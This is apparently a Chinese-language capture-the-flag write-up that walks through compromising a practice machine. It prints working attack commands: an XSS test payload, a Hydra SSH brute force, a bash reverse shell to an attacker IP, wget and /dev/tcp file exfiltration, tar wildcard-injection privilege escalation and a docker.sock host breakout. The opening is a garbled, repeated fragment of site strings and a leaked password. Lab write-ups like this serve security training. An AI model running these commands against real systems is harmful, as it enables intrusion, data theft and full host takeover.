password. Your new password is: @b_ENXkGYUCAv3zJ,<script>alert(1)</script>,Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace!,Thank you for your report. We have been unable to review the listing at this time. Something may be blocking our ability to view it, such as alert boxes, which are blocked in our employee's browsers.,Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace!,Thank you for your report. We have been unable to review the listing at this time. Something may be blocking our ability to view it, such as alert boxes, which are blocked in our employee's browsers.,Thank you for your repor 看到一段看起來很像密碼的東西@b_ENXkGYUCAv3zJ SSH 我們有 3 個 userjake michael system雖然可以徒手戳一下就好，但我今天想用 Hydra- hydra -L user.txt -P password.txt ssh://10.10.74.8 噴出的結果是 jakejake : @b_ENXkGYUCAv3zJSSH 登入成功- 取得 user keyTHM{c3648ee7af1369676e3e4b15da6dc0b4} 提權 起手式先 sudo -l 一波 看起來是很老梗的 sudo 備份 ㄇ如果是的話我們只要戳個 Reverse shellecho "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'" >> /opt/backups/backup.sh就可以打完收工ㄌ但前題是我們需要有權限修改這個 sh- 看樣子不行QQ，我們不是賣口 QQ準備 Linpeas- wget 10.13.21.55:8000/linpeas.sh 發現 sudo version 1.8.21p2https://www.exploit-db.com/exploits/47502 但看起來不好用發現一包 backup 檔案- 用 nc 傳出來nc -l 1234 > backup.tar cat backup.tar > /dev/tcp/10.13.21.55/1234 發現裡面都空ㄉㄍ騙我 回想起 backup.sh 他後面接了一個 *- 這個時候可以套用 tar-wildcard-injectionref : https://mqt.gitbook.io/oscp-notes/tar-wildcard-injection 簡單來說 tar 會把後面的 * 的東西直接串起來當指令執行echo a > '--checkpoint=1'``echo a > '--checkpoint-action=exec=sh script.sh'echo whoami > script.sh用 賣口權限執行- sudo -u michael /opt/backups/backup.sh 發現可以成功!!! 切換到賣口- echo bash > script.sh 二次提權 再一次 Linpeas發現 /var/run/docker.sock 可以寫入- 直接給我們 Exploit 教學ㄌ，好棒https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket觀察目前有使用的 docker image- 修改一下 image 的名字，使用 hacktricks 上面的 exploit 教學- docker -H unix:///var/run/docker.sock run -v /:/host -it nginx chroot /host /bin/bash docker -H unix:///var/run/docker.sock run -it --privileged --pid=host nginx nsenter -t 1 -m -u -n -i sh創建 privileged 康天呢提權成功-